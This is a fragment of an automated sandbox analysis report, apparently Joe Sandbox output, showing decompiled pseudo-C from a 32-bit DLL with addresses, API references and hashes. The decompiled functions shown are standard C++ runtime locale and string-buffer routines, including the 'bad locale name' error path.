																					_t243 = E6DA562F0(_t369, _t435,  &_v36, _v12);
																					_t508 = _t506 + 8;
																					__eflags = _t243 - 0xffffffff;
																					if(__eflags == 0) {
																						E6DA52950();
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						_push(_t484);
																						_t486 = _t508;
																						_t509 = _t508 - 8;
																						_push(_t369);
																						_t371 = _t394;
																						_t397 = 0x7fffffff;
																						_push(_t453);
																						_t455 = _v244;
																						_t424 = _t371[4];
																						_v256 = _t424;
																						_push(_t435);
																						__eflags = 0x7fffffff - _t424 - _t455;
																						if(__eflags < 0) {
																							E6DA514C0(_t371, 0x7fffffff, _t424, __eflags);
																							goto L81;
																						} else {
																							_t435 = _t371[5];
																							_t307 = _t424 + _t455;
																							_v32 = _t307;
																							_t473 = _t307 | 0x0000000f;
																							_v16 = _t435;
																							__eflags = _t473 - 0x7fffffff;
																							if(__eflags <= 0) {
																								_t309 = _t435 >> 1;
																								_t397 = 0x7fffffff - _t309;
																								__eflags = _t435 - _t397;
																								if(__eflags <= 0) {
																									_t310 = _t309 + _t435;
																									__eflags = _t473 - _t310;
																									_t455 =  <  ? _t310 : _t473;
																									_t124 = _t455 + 1; // 0x80000000
																									_t397 = _t124;
																									__eflags = _t397 - 0x1000;
																									if(_t397 < 0x1000) {
																										__eflags = _t397;
																										if(__eflags == 0) {
																											_t435 = 0;
																											__eflags = 0;
																										} else {
																											_t324 = E6DA59399(_t435, _t455, __eflags, _t397);
																											_t424 = _v28;
																											_t509 = _t509 + 4;
																											_t435 = _t324;
																										}
																										goto L74;
																									} else {
																										_t125 =  &(_t397[8]); // 0x80000023
																										_t325 = _t125;
																										__eflags = _t125 - _t397;
																										if(__eflags <= 0) {
																											L81:
																											E6DA51420();
																											goto L82;
																										} else {
																											goto L64;
																										}
																									}
																								} else {
																									_t455 = 0x7fffffff;
																									goto L63;
																								}
																							} else {
																								_t455 = 0x7fffffff;
																								L63:
																								_t325 = 0x80000023;
																								L64:
																								_t326 = E6DA59399(_t435, _t455, __eflags, _t325);
																								_t509 = _t509 + 4;
																								__eflags = _t326;
																								if(_t326 == 0) {
																									L82:
																									E6DA5DACF(_t371, _t397, _t424);
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									_push(_t486);
																									_t487 = _t509;
																									_t510 = _t509 - 0xc;
																									_t425 = _v260;
																									_push(_t371);
																									_t372 = _t397;
																									_t398 = 0x7fffffff;
																									_push(_t455);
																									_push(_t435);
																									_t456 = _t372[4];
																									_v272 = _t456;
																									__eflags = 0x7fffffff - _t456 - _t425;
																									if(__eflags < 0) {
																										E6DA514C0(_t372, 0x7fffffff, _t425, __eflags);
																										goto L104;
																									} else {
																										_t435 = _t372[5];
																										_t283 = _t456 + _t425;
																										_v36 = _t283;
																										_t467 = _t283 | 0x0000000f;
																										_v20 = _t435;
																										__eflags = _t467 - 0x7fffffff;
																										if(__eflags <= 0) {
																											_t285 = _t435 >> 1;
																											_t398 = 0x7fffffff - _t285;
																											__eflags = _t435 - _t398;
																											if(__eflags <= 0) {
																												_t286 = _t285 + _t435;
																												__eflags = _t467 - _t286;
																												_t456 =  <  ? _t286 : _t467;
																												_t154 = _t456 + 1; // 0x80000000
																												_t398 = _t154;
																												__eflags = _t398 - 0x1000;
																												if(_t398 < 0x1000) {
																													__eflags = _t398;
																													if(__eflags == 0) {
																														_t435 = 0;
																														__eflags = 0;
																													} else {
																														_t304 = E6DA59399(_t435, _t456, __eflags, _t398);
																														_t510 = _t510 + 4;
																														_t435 = _t304;
																													}
																													goto L97;
																												} else {
																													_t155 = _t398 + 0x23; // 0x80000023
																													_t305 = _t155;
																													__eflags = _t155 - _t398;
																													if(__eflags <= 0) {
																														L104:
																														E6DA51420();
																														goto L105;
																													} else {
																														goto L87;
																													}
																												}
																											} else {
																												_t456 = 0x7fffffff;
																												goto L86;
																											}
																										} else {
																											_t456 = 0x7fffffff;
																											L86:
																											_t305 = 0x80000023;
																											L87:
																											_t306 = E6DA59399(_t435, _t456, __eflags, _t305);
																											_t510 = _t510 + 4;
																											__eflags = _t306;
																											if(_t306 == 0) {
																												L105:
																												E6DA5DACF(_t372, _t398, _t425);
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												_push(_t487);
																												_t511 = _t510 - 8;
																												_push(_t372);
																												_t373 = _t398;
																												_t399 = 0x7fffffff;
																												_push(_t456);
																												_t457 = _v280;
																												_t426 = _t373[4];
																												_v292 = _t426;
																												_push(_t435);
																												__eflags = 0x7fffffff - _t426 - _t457;
																												if(__eflags < 0) {
																													E6DA514C0(_t373, 0x7fffffff, _t426, __eflags);
																													goto L127;
																												} else {
																													_t437 = _t373[5];
																													_t262 = _t426 + _t457;
																													_v40 = _t262;
																													_t459 = _t262 | 0x0000000f;
																													_v24 = _t437;
																													__eflags = _t459 - 0x7fffffff;
																													if(__eflags <= 0) {
																														_t264 = _t437 >> 1;
																														_t399 = 0x7fffffff - _t264;
																														__eflags = _t437 - _t399;
																														if(__eflags <= 0) {
																															_t265 = _t264 + _t437;
																															__eflags = _t459 - _t265;
																															_t460 =  <  ? _t265 : _t459;
																															_t193 = _t460 + 1; // 0x80000000
																															_t399 = _t193;
																															__eflags = _t399 - 0x1000;
																															if(_t399 < 0x1000) {
																																__eflags = _t399;
																																if(__eflags == 0) {
																																	_t438 = 0;
																																	__eflags = 0;
																																} else {
																																	_t280 = E6DA59399(_t437, _t460, __eflags, _t399);
																																	_t426 = _v36;
																																	_t511 = _t511 + 4;
																																	_t438 = _t280;
																																}
																																goto L120;
																															} else {
																																_t194 = _t399 + 0x23; // 0x80000023
																																_t281 = _t194;
																																__eflags = _t194 - _t399;
																																if(__eflags <= 0) {
																																	L127:
																																	E6DA51420();
																																	goto L128;
																																} else {
																																	goto L110;
																																}
																															}
																														} else {
																															_t460 = 0x7fffffff;
																															goto L109;
																														}
																													} else {
																														_t460 = 0x7fffffff;
																														L109:
																														_t281 = 0x80000023;
																														L110:
																														_t282 = E6DA59399(_t437, _t460, __eflags, _t281);
																														_t511 = _t511 + 4;
																														__eflags = _t282;
																														if(_t282 == 0) {
																															L128:
																															_t259 = E6DA5DACF(_t373, _t399, _t426);
																															asm("int3");
																															asm("int3");
																															asm("int3");
																															asm("int3");
																															asm("int3");
																															asm("int3");
																															asm("int3");
																															asm("int3");
																															_t400 =  *_t399;
																															__eflags = _t400;
																															if(_t400 != 0) {
																																return  *((intOrPtr*)( *_t400))(1);
																															}
																															return _t259;
																														} else {
																															_t426 = _v36;
																															_t191 = _t282 + 0x23; // 0x23
																															_t438 = _t191 & 0xffffffe0;
																															 *(_t438 - 4) = _t282;
																															L120:
																															_t373[4] = _v40;
																															_t373[5] = _t460;
																															_t461 = _t438 + _t426;
																															_v40 = _t461;
																															__eflags = _v24 - 0x10;
																															_v36 = _v16 + _t461;
																															_push(_t426);
																															if(_v24 < 0x10) {
																																_push(_t373);
																																_push(_t438);
																																E6DA5AB10();
																																E6DA5B0A0(_t438, _t461, _v12, _v16);
																																 *_v36 = 0;
																																 *_t373 = _t438;
																																return _t373;
																															} else {
																																_t463 =  *_t373;
																																_push(_t463);
																																_push(_t438);
																																E6DA5AB10();
																																E6DA5B0A0(_t438, _v40, _v12, _v16);
																																_t402 = _v24 + 1;
																																 *_v36 = 0;
																																__eflags = _t402 - 0x1000;
																																if(_t402 < 0x1000) {
																																	L124:
																																	_push(_t402);
																																	E6DA593C9(_t463);
																																	 *_t373 = _t438;
																																	return _t373;
																																} else {
																																	_t426 =  *(_t463 - 4);
																																	_t399 = _t402 + 0x23;
																																	_t212 = _t463 - _t426 - 4; // 0x7ffffffb
																																	__eflags = _t212 - 0x1f;
																																	if(_t212 > 0x1f) {
																																		goto L128;
																																	} else {
																																		_t463 = _t426;
																																		goto L124;
																																	}
																																}
																															}
																														}
																													}
																												}
																											} else {
																												_t152 = _t306 + 0x23; // 0x23
																												_t435 = _t152 & 0xffffffe0;
																												 *(_t435 - 4) = _t306;
																												L97:
																												_t372[4] = _v36;
																												_t289 = _v12;
																												_t372[5] = _t456;
																												_v32 = _v32 - _t289 + 1;
																												_t468 = _t435 + _t289;
																												_v40 = _t468;
																												__eflags = _v20 - 0x10;
																												_v36 = _v8 + _t468;
																												_push(_t289);
																												if(_v20 < 0x10) {
																													_push(_t372);
																													_push(_t435);
																													E6DA5AB10();
																													E6DA5B0A0(_t435, _t468, _v4, _v8);
																													__eflags = _t372 + _v12;
																													E6DA5AB10(_v36, _t372 + _v12, _v32);
																													 *_t372 = _t435;
																													return _t372;
																												} else {
																													_t470 =  *_t372;
																													_push(_t470);
																													_push(_t435);
																													E6DA5AB10();
																													E6DA5B0A0(_t435, _v40, _v4, _v8);
																													E6DA5AB10(_v36, _v12 + _t470, _v32);
																													_t510 = _t510 + 0x24;
																													_t409 = _v20 + 1;
																													__eflags = _t409 - 0x1000;
																													if(_t409 < 0x1000) {
																														L101:
																														_push(_t409);
																														E6DA593C9(_t470);
																														 *_t372 = _t435;
																														return _t372;
																													} else {
																														_t425 =  *(_t470 - 4);
																														_t398 = _t409 + 0x23;
																														_t456 = _t470 - _t425;
																														_t177 = _t456 - 4; // 0x7ffffffb
																														__eflags = _t177 - 0x1f;
																														if(_t177 > 0x1f) {
																															goto L105;
																														} else {
																															_t470 = _t425;
																															goto L101;
																														}
																													}
																												}
																											}
																										}
																									}
																								} else {
																									_t424 = _v28;
																									_t122 = _t326 + 0x23; // 0x23
																									_t435 = _t122 & 0xffffffe0;
																									 *(_t435 - 4) = _t326;
																									L74:
																									_t371[4] = _v32;
																									_t371[5] = _t455;
																									_t474 = _t435 + _t424;
																									_v32 = _t474;
																									__eflags = _v16 - 0x10;
																									_v28 = _v4 + _t474;
																									_push(_t424);
																									if(_v16 < 0x10) {
																										_push(_t371);
																										_push(_t435);
																										E6DA5AB10();
																										E6DA5AB10(_t474, _v8, _v4);
																										 *_v28 = 0;
																										 *_t371 = _t435;
																										return _t371;
																									} else {
																										_t476 =  *_t371;
																										_push(_t476);
																										_push(_t435);
																										E6DA5AB10();
																										E6DA5AB10(_v32, _v8, _v4);
																										_t509 = _t509 + 0x18;
																										_t411 = _v16 + 1;
																										 *_v28 = 0;
																										__eflags = _t411 - 0x1000;
																										if(_t411 < 0x1000) {
																											L78:
																											_push(_t411);
																											E6DA593C9(_t476);
																											 *_t371 = _t435;
																											return _t371;
																										} else {
																											_t424 =  *(_t476 - 4);
																											_t397 = _t411 + 0x23;
																											_t455 = _t476 - _t424;
																											_t141 = _t455 - 4; // 0x7ffffffb
																											__eflags = _t141 - 0x1f;
																											if(_t141 > 0x1f) {
																												goto L82;
																											} else {
																												_t476 = _t424;
																												goto L78;
																											}
																										}
																									}
																								}
																							}
																						}
																					} else {
																						_t453 = _v36;
																						_v12 = _t453;
																						_v24 = 1;
																						E6DA58A87(__eflags, _t453);
																						 *((intOrPtr*)( *_t453 + 4))();
																						 *0x6daa5c78 = _t453;
																						goto L58;
																					}
																				} else {
																					_t453 = _t369;
																					goto L58;
																				}
																			} else {
																				_t453 =  *( *((intOrPtr*)(_t329 + 8)) + _t435 * 4);
																				goto L53;
																			}
																		}
																	}
																}
															} else {
																E6DA58BB9( &_v88,  &_v88, _t434);
																 *((intOrPtr*)(_t451 + 4)) = 0;
																 *_t451 = 0x6da74e00;
																E6DA529E0( &_v88);
																_v8 = _t451;
																_v20 = 9;
																E6DA58A87(__eflags, _t451);
																 *((intOrPtr*)( *_t451 + 4))();
																 *0x6daa5c7c = _t451;
																goto L27;
															}
														} else {
															_t451 = _t367;
															goto L27;
														}
													} else {
														_t451 =  *( *((intOrPtr*)(_t342 + 8)) + _t432 * 4);
														goto L32;
													}
												}
											} else {
												L27:
												E6DA5892E( &_v36);
												 *[fs:0x0] = _v28;
												return _t451;
											}
										}
									} else {
										E6DA58BB9( &_v112,  &_v112, _t431);
										 *((intOrPtr*)(_t449 + 4)) = 0;
										 *_t449 = 0x6da74dd0;
										E6DA58DE6(_t431, _t449, __eflags,  &_v60);
										asm("movups xmm0, [eax]");
										asm("movups [esi+0x8], xmm0");
										E6DA529E0( &_v112);
										_v36 = _t449;
										_v16 = 9;
										E6DA58A87(__eflags, _t449);
										 *((intOrPtr*)( *_t449 + 4))();
										 *0x6daa5c80 = _t449;
										goto L6;
									}
								} else {
									_t449 = _t221;
									goto L6;
								}
							} else {
								_t449 =  *( *((intOrPtr*)(_t357 + 8)) + _t429 * 4);
								goto L11;
							}
						}
					} else {
						L6:
						E6DA5892E( &_v40);
						 *[fs:0x0] = _v24;
						return _t449;
					}
				}
			}

0x6da55a50
0x6da55a51
0x6da55a59
0x6da55a60
0x6da55a64
0x6da55a66
0x6da55a68
0x6da55a73
0x6da55a74
0x6da55a7b
0x6da55a7c
0x6da55a7f
0x6da55a80
0x6da55a86
0x6da55a8b
0x6da55a92
0x6da55a98
0x6da55a9d
0x6da55aa2
0x6da55aa8
0x6da55aad
0x6da55ab3
0x6da55ab5
0x6da55aba
0x6da55abb
0x6da55ac0
0x6da55ac0
0x6da55ac8
0x6da55acd
0x6da55acd
0x6da55ad6
0x6da55ad6
0x6da55adc
0x6da55b05
0x6da55b05
0x00000000
0x6da55ade
0x6da55ae1
0x6da55ae6
0x6da55b07
0x6da55b07
0x6da55b0b
0x6da55b1d
0x6da55b1d
0x6da55b1f
0x00000000
0x00000000
0x00000000
0x00000000
0x6da55b0d
0x6da55b0d
0x6da55b12
0x6da55b15
0x6da55b21
0x6da55b21
0x6da55b24
0x6da55b26
0x6da55b33
0x6da55b35
0x6da55b38
0x6da55b3e
0x6da55b3e
0x6da55b41
0x6da55b43
0x6da55b51
0x6da55b45
0x6da55b45
0x6da55b48
0x6da55b4a
0x6da55b4c
0x6da55b4c
0x6da55b4c
0x6da55b4a
0x6da55b5b
0x6da55b60
0x6da55b67
0x6da55b6b
0x6da55b72
0x6da55b78
0x6da55b7f
0x6da55b83
0x6da55b86
0x6da55b8a
0x6da55b8d
0x6da55b90
0x6da55b93
0x6da55b96
0x6da55b9a
0x6da55b9c
0x6da55bf7
0x6da55bfc
0x6da55bfd
0x6da55bfe
0x6da55bff
0x6da55c00
0x6da55c01
0x6da55c03
0x6da55c05
0x6da55c10
0x6da55c11
0x6da55c18
0x6da55c1b
0x6da55c1c
0x6da55c1d
0x6da55c23
0x6da55c28
0x6da55c2f
0x6da55c35
0x6da55c3b
0x6da55c3d
0x6da55c43
0x6da55c48
0x6da55c4e
0x6da55c50
0x6da55c55
0x6da55c55
0x6da55c56
0x6da55c5b
0x6da55c5b
0x6da55c63
0x6da55c68
0x6da55c68
0x6da55c71
0x6da55c74
0x6da55c77
0x6da55c9e
0x6da55c9e
0x00000000
0x6da55c79
0x6da55c7c
0x6da55c7f
0x6da55c81
0x6da55ca0
0x6da55ca0
0x6da55ca4
0x6da55cb6
0x6da55cb6
0x6da55cb8
0x00000000
0x00000000
0x00000000
0x00000000
0x6da55ca6
0x6da55ca6
0x6da55cab
0x6da55cae
0x6da55cba
0x6da55cba
0x6da55cbc
0x6da55cc9
0x6da55ccb
0x6da55cce
0x6da55cd4
0x6da55cd7
0x6da55cd9
0x6da55ce7
0x6da55cdb
0x6da55cdb
0x6da55cde
0x6da55ce0
0x6da55ce2
0x6da55ce2
0x6da55ce0
0x6da55cf1
0x6da55cf6
0x6da55cfd
0x6da55d01
0x6da55d08
0x6da55d0e
0x6da55d15
0x6da55d19
0x6da55d1c
0x6da55d20
0x6da55d23
0x6da55d26
0x6da55d29
0x6da55d2c
0x6da55d30
0x6da55d32
0x6da55d7d
0x6da55d82
0x6da55d83
0x6da55d84
0x6da55d85
0x6da55d86
0x6da55d87
0x6da55d88
0x6da55d89
0x6da55d8a
0x6da55d8b
0x6da55d8c
0x6da55d8d
0x6da55d8e
0x6da55d8f
0x6da55d90
0x6da55d91
0x6da55d93
0x6da55d95
0x6da55da0
0x6da55da1
0x6da55da8
0x6da55dab
0x6da55dac
0x6da55dad
0x6da55db3
0x6da55db8
0x6da55dbf
0x6da55dc5
0x6da55dcb
0x6da55dce
0x6da55dd0
0x6da55dd6
0x6da55ddb
0x6da55de1
0x6da55de3
0x6da55de8
0x6da55de8
0x6da55de9
0x6da55dee
0x6da55dee
0x6da55df6
0x6da55dfb
0x6da55dfb
0x6da55e04
0x6da55e07
0x6da55e0a
0x6da55e18
0x6da55e18
0x00000000
0x6da55e0c
0x6da55e0f
0x6da55e12
0x6da55e14
0x6da55e70
0x6da55e73
0x6da55e80
0x6da55e8a
0x6da55e16
0x6da55e1a
0x6da55e1a
0x6da55e1e
0x6da55e30
0x6da55e30
0x6da55e32
0x00000000
0x00000000
0x00000000
0x00000000
0x6da55e20
0x6da55e20
0x6da55e25
0x6da55e28
0x6da55e34
0x6da55e34
0x6da55e36
0x6da55e43
0x6da55e48
0x6da55e4b
0x6da55e4e
0x6da55e8b
0x6da55e90
0x6da55e91
0x6da55e92
0x6da55e93
0x6da55e94
0x6da55e95
0x6da55e96
0x6da55e97
0x6da55e98
0x6da55e99
0x6da55e9a
0x6da55e9b
0x6da55e9c
0x6da55e9d
0x6da55e9e
0x6da55e9f
0x6da55ea0
0x6da55ea1
0x6da55ea3
0x6da55ea6
0x6da55ea7
0x6da55ea9
0x6da55eb0
0x6da55eb1
0x6da55eb4
0x6da55eb9
0x6da55ebc
0x6da55ebd
0x6da55ebf
0x6da55fe2
0x00000000
0x6da55ec5
0x6da55ec5
0x6da55ec8
0x6da55ecd
0x6da55ed0
0x6da55ed3
0x6da55ed6
0x6da55ed8
0x6da55f02
0x6da55f04
0x6da55f06
0x6da55f08
0x6da55f11
0x6da55f13
0x6da55f15
0x6da55f18
0x6da55f18
0x6da55f1b
0x6da55f21
0x6da55f30
0x6da55f32
0x6da55f44
0x6da55f44
0x6da55f34
0x6da55f35
0x6da55f3a
0x6da55f3d
0x6da55f40
0x6da55f40
0x00000000
0x6da55f23
0x6da55f23
0x6da55f23
0x6da55f26
0x6da55f28
0x6da55fe7
0x6da55fe7
0x00000000
0x6da55f2e
0x00000000
0x6da55f2e
0x6da55f28
0x6da55f0a
0x6da55f0a
0x00000000
0x6da55f0a
0x6da55eda
0x6da55eda
0x6da55edc
0x6da55edc
0x6da55ee1
0x6da55ee2
0x6da55ee7
0x6da55eea
0x6da55eec
0x6da55fec
0x6da55fec
0x6da55ff1
0x6da55ff2
0x6da55ff3
0x6da55ff4
0x6da55ff5
0x6da55ff6
0x6da55ff7
0x6da55ff8
0x6da55ff9
0x6da55ffa
0x6da55ffb
0x6da55ffc
0x6da55ffd
0x6da55ffe
0x6da55fff
0x6da56000
0x6da56001
0x6da56003
0x6da56006
0x6da56009
0x6da5600a
0x6da5600c
0x6da56011
0x6da56014
0x6da56015
0x6da5601a
0x6da5601d
0x6da5601f
0x6da56165
0x00000000
0x6da56025
0x6da56025
0x6da56028
0x6da5602d
0x6da56030
0x6da56033
0x6da56036
0x6da56038
0x6da5605f
0x6da56061
0x6da56063
0x6da56065
0x6da5606e
0x6da56070
0x6da56072
0x6da56075
0x6da56075
0x6da56078
0x6da5607e
0x6da5608d
0x6da5608f
0x6da5609e
0x6da5609e
0x6da56091
0x6da56092
0x6da56097
0x6da5609a
0x6da5609a
0x00000000
0x6da56080
0x6da56080
0x6da56080
0x6da56083
0x6da56085
0x6da5616a
0x6da5616a
0x00000000
0x6da5608b
0x00000000
0x6da5608b
0x6da56085
0x6da56067
0x6da56067
0x00000000
0x6da56067
0x6da5603a
0x6da5603a
0x6da5603c
0x6da5603c
0x6da56041
0x6da56042
0x6da56047
0x6da5604a
0x6da5604c
0x6da5616f
0x6da5616f
0x6da56174
0x6da56175
0x6da56176
0x6da56177
0x6da56178
0x6da56179
0x6da5617a
0x6da5617b
0x6da5617c
0x6da5617d
0x6da5617e
0x6da5617f
0x6da56180
0x6da56183
0x6da56186
0x6da56187
0x6da56189
0x6da56190
0x6da56191
0x6da56194
0x6da56199
0x6da5619c
0x6da5619d
0x6da5619f
0x6da562c9
0x00000000
0x6da561a5
0x6da561a5
0x6da561a8
0x6da561ad
0x6da561b0
0x6da561b3
0x6da561b6
0x6da561b8
0x6da561e2
0x6da561e4
0x6da561e6
0x6da561e8
0x6da561f1
0x6da561f3
0x6da561f5
0x6da561f8
0x6da561f8
0x6da561fb
0x6da56201
0x6da56210
0x6da56212
0x6da56224
0x6da56224
0x6da56214
0x6da56215
0x6da5621a
0x6da5621d
0x6da56220
0x6da56220
0x00000000
0x6da56203
0x6da56203
0x6da56203
0x6da56206
0x6da56208
0x6da562ce
0x6da562ce
0x00000000
0x6da5620e
0x00000000
0x6da5620e
0x6da56208
0x6da561ea
0x6da561ea
0x00000000
0x6da561ea
0x6da561ba
0x6da561ba
0x6da561bc
0x6da561bc
0x6da561c1
0x6da561c2
0x6da561c7
0x6da561ca
0x6da561cc
0x6da562d3
0x6da562d3
0x6da562d8
0x6da562d9
0x6da562da
0x6da562db
0x6da562dc
0x6da562dd
0x6da562de
0x6da562df
0x6da562e0
0x6da562e2
0x6da562e4
0x00000000
0x6da562ea
0x6da562ec
0x6da561d2
0x6da561d2
0x6da561d5
0x6da561d8
0x6da561db
0x6da56226
0x6da56229
0x6da56236
0x6da56239
0x6da5623e
0x6da56241
0x6da56245
0x6da56248
0x6da56249
0x6da562a0
0x6da562a1
0x6da562a2
0x6da562ae
0x6da562b9
0x6da562be
0x6da562c6
0x6da5624b
0x6da5624b
0x6da5624d
0x6da5624e
0x6da5624f
0x6da5625d
0x6da5626b
0x6da5626c
0x6da5626f
0x6da56275
0x6da56289
0x6da56289
0x6da5628b
0x6da56293
0x6da5629d
0x6da56277
0x6da56277
0x6da5627a
0x6da5627f
0x6da56282
0x6da56285
0x00000000
0x6da56287
0x6da56287
0x00000000
0x6da56287
0x6da56285
0x6da56275
0x6da56249
0x6da561cc
0x6da561b8
0x6da56052
0x6da56052
0x6da56055
0x6da56058
0x6da560a0
0x6da560a6
0x6da560b0
0x6da560b6
0x6da560b9
0x6da560bf
0x6da560c4
0x6da560c7
0x6da560cb
0x6da560ce
0x6da560cf
0x6da56131
0x6da56132
0x6da56133
0x6da5613f
0x6da5614a
0x6da56150
0x6da56158
0x6da56162
0x6da560d1
0x6da560d1
0x6da560d3
0x6da560d4
0x6da560d5
0x6da560e3
0x6da560f4
0x6da560fc
0x6da560ff
0x6da56100
0x6da56106
0x6da5611a
0x6da5611a
0x6da5611c
0x6da56124
0x6da5612e
0x6da56108
0x6da56108
0x6da5610b
0x6da5610e
0x6da56110
0x6da56113
0x6da56116
0x00000000
0x6da56118
0x6da56118
0x00000000
0x6da56118
0x6da56116
0x6da56106
0x6da560cf
0x6da5604c
0x6da56038
0x6da55ef2
0x6da55ef2
0x6da55ef5
0x6da55ef8
0x6da55efb
0x6da55f46
0x6da55f49
0x6da55f4f
0x6da55f52
0x6da55f57
0x6da55f5a
0x6da55f5e
0x6da55f61
0x6da55f62
0x6da55fb9
0x6da55fba
0x6da55fbb
0x6da55fc7
0x6da55fd2
0x6da55fd7
0x6da55fdf
0x6da55f64
0x6da55f64
0x6da55f66
0x6da55f67
0x6da55f68
0x6da55f76
0x6da55f7e
0x6da55f84
0x6da55f85
0x6da55f88
0x6da55f8e
0x6da55fa2
0x6da55fa2
0x6da55fa4
0x6da55fac
0x6da55fb6
0x6da55f90
0x6da55f90
0x6da55f93
0x6da55f96
0x6da55f98
0x6da55f9b
0x6da55f9e
0x00000000
0x6da55fa0
0x6da55fa0
0x00000000
0x6da55fa0
0x6da55f9e
0x6da55f8e
0x6da55f62
0x6da55eec
0x6da55ed8
0x6da55e50
0x6da55e50
0x6da55e53
0x6da55e57
0x6da55e5b
0x6da55e67
0x6da55e6a
0x00000000
0x6da55e6a
0x6da55e38
0x6da55e38
0x00000000
0x6da55e38
0x6da55e2a
0x6da55e2d
0x00000000
0x6da55e2d
0x6da55e28
0x6da55e1e
0x6da55e14
0x6da55d34
0x6da55d39
0x6da55d41
0x6da55d4b
0x6da55d51
0x6da55d56
0x6da55d5a
0x6da55d5e
0x6da55d6a
0x6da55d6d
0x00000000
0x6da55d6d
0x6da55cbe
0x6da55cbe
0x00000000
0x6da55cbe
0x6da55cb0
0x6da55cb3
0x00000000
0x6da55cb3
0x6da55cae
0x6da55c83
0x6da55c83
0x6da55c86
0x6da55c93
0x6da55c9d
0x6da55c9d
0x6da55c81
0x6da55b9e
0x6da55ba3
0x6da55bab
0x6da55bb3
0x6da55bb9
0x6da55bc4
0x6da55bc7
0x6da55bcb
0x6da55bd0
0x6da55bd4
0x6da55bd8
0x6da55be4
0x6da55be7
0x00000000
0x6da55be7
0x6da55b28
0x6da55b28
0x00000000
0x6da55b28
0x6da55b17
0x6da55b1a
0x00000000
0x6da55b1a
0x6da55b15
0x6da55ae8
0x6da55ae8
0x6da55aeb
0x6da55af6
0x6da55b04
0x6da55b04
0x6da55ae6

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6DA55A86
std::_Lockit::_Lockit.LIBCPMT ref: 6DA55AA8
std::_Lockit::~_Lockit.LIBCPMT ref: 6DA55AC8
std::_Lockit::~_Lockit.LIBCPMT ref: 6DA55AEB
std::_Lockit::_Lockit.LIBCPMT ref: 6DA55B5B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DA55BA3
__Getctype.LIBCPMT ref: 6DA55BB9
std::_Facet_Register.LIBCPMT ref: 6DA55BD8

Strings

bad locale name, xrefs: 6DA55BF2

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_$Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegister
String ID: bad locale name
API String ID: 2622896957-1405518554
Opcode ID: 450fe787241905794bb442820b96bcb8edd654a5f59520f5a9b8b5595675176d
Instruction ID: 596279c3e7dcd9686b74a62d92aaa466dc5168f83c3d6c9a01c48da6c84e03e6
Opcode Fuzzy Hash: 450fe787241905794bb442820b96bcb8edd654a5f59520f5a9b8b5595675176d
Instruction Fuzzy Hash: F851A275D0C349DFCB11CFA8C9847AEBBB4FF15310F1A8159D944AB281EB30A995CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6DA562F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6DA562F0(void* __ebx, void* __edi, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				short _v40;
				char _v44;
				short _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				intOrPtr _v76;
				char _v120;
				char _v164;
				void* __esi;
				intOrPtr _t48;
				void* _t54;
				char* _t64;
				intOrPtr _t66;
				short _t67;
				char _t69;
				char _t70;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t77;
				void* _t79;
				intOrPtr _t81;
				void* _t83;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr _t91;
				void* _t92;
				void* _t94;

				_push(0xffffffff);
				_push(E6DA72715);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t91;
				_t92 = _t91 - 0x94;
				_v20 = 0;
				_t73 = _a4;
				if(_t73 == 0) {
					L11:
					 *[fs:0x0] = _v16;
					return 4;
				} else {
					_t97 =  *_t73;
					if( *_t73 != 0) {
						goto L11;
					} else {
						_push(_t83);
						_push(__edi);
						_t84 = E6DA59399(__edi, _t83, _t97, 0x18);
						_t94 = _t92 + 4;
						_a4 = _t84;
						_t76 = _a8;
						_v8 = 0;
						_t6 = _t76 + 4; // 0x61657274
						_t48 =  *_t6;
						if(_t48 == 0) {
							_t81 = 0x6da7f2c7;
						} else {
							_t81 =  *((intOrPtr*)(_t48 + 0x18));
							if(_t81 == 0) {
								_t8 = _t48 + 0x1c; // 0x61657290
								_t81 = _t8;
							}
						}
						_t77 =  &_v72;
						E6DA588D6(_t77, 0);
						_v68 = 0;
						_v64 = 0;
						_v60 = 0;
						_v56 = 0;
						_v52 = 0;
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						_v24 = 0;
						_v8 = 7;
						_t100 = _t81;
						if(_t81 == 0) {
							E6DA58889("bad locale name");
							goto L13;
						} else {
							E6DA58BB9(_t77,  &_v72, _t81);
							_v20 = 1;
